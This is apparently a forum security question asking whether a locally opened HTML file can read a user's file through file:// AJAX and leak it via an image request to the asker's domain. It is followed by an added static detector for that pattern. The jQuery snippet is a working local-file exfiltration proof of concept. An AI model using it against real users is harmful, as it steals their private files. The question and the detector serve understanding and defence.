Let's talk about security. It seems to me that, theoretically, I can get information from a user's file system with some script, if the user opens an HTML file containing it (opens it from his file system, not from the network). Look at the code:
info.txt:

```
my info
```

index.html:

```html
<!doctype html>
<html>
<head>
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/>
    <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.8.1/jquery.min.js"></script>
    <script>
        $(document).ready(function () {
            $.get('file:///home/daz/desktop/info.txt', function (data) {
                $('<img>').attr('src', 'http://domain.com?data=' + escape(data)).appendTo('body');
            }, 'text');
        });
    </script>
</head>
<body></body>
</html>
```
Some browsers (Firefox, for example) allow you to get files from `file://` through `XmlHttpRequest`, so if I guess the path to the file, then I can get its content by AJAX. And then I can dynamically add an `img` tag with `src` leading to my domain with parameters in the query string. And the browser obediently makes a request `GET ?data=my%20info%0A domain.com`. And on the server side I can parse the query string and get the data.
Am I right that I can do this? Am I right that I can get a user's data from his computer if he opens my HTML file? So I can just say: "Hey, friend, check out this file!" (with 2 restrictions: the user should use Firefox or something else with a similar configuration, and I cannot get files the user cannot access because of access rights).
UPDATED:
If it is possible, then why is it possible? Why do they allow you to do such things? Why are there no confirmation dialogs or something?
UPDATED 2:
It would be great if someone could review this issue. Thanks in advance!
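A static triage check for the pattern described in the question, as an added example that is not part of the original post: it flags an HTML file whose inline script both names a `file://` URL and concatenates a runtime value onto a remote URL. The names `SAMPLE`, `inlineScripts` and `triage` are hypothetical, and the sample input is constructed from the `index.html` above.

```javascript
// Added example (not from the post): flag HTML whose inline script both
// references a file:// URL and builds a remote URL from a runtime value.
// Constructed sample: a shortened copy of the index.html shown in the question.
const SAMPLE = [
  '<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.8.1/jquery.min.js"></script>',
  '<script>',
  "$.get('file:///home/daz/desktop/info.txt', function (data) {",
  "  $('<img>').attr('src', 'http://domain.com?data=' + escape(data)).appendTo('body');",
  "}, 'text');",
  '</script>',
].join('\n');

// Return the bodies of inline <script> elements (external ones carry no body).
function inlineScripts(html) {
  const bodies = [];
  const re = /<script\b([^>]*)>([\s\S]*?)<\/script\s*>/gi;
  let m;
  while ((m = re.exec(html)) !== null) {
    if (!/\bsrc\s*=/i.test(m[1])) bodies.push(m[2]);
  }
  return bodies;
}

function triage(html) {
  const localReads = [];
  const remoteSinks = [];
  for (const js of inlineScripts(html)) {
    // String literals naming a local file.
    for (const m of js.matchAll(/(['"`])(file:\/\/[^'"`]*)\1/gi)) localReads.push(m[2]);
    // http(s) literals concatenated with something computed at run time.
    for (const m of js.matchAll(/(['"`])(https?:\/\/[^'"`]*)\1\s*\+/gi)) remoteSinks.push(m[2]);
  }
  return { localReads, remoteSinks, suspicious: localReads.length > 0 && remoteSinks.length > 0 };
}

console.log(triage(SAMPLE));
```

This is a heuristic for triaging an untrusted file before opening it, not a substitute for the browser's own restrictions on `file://` origins.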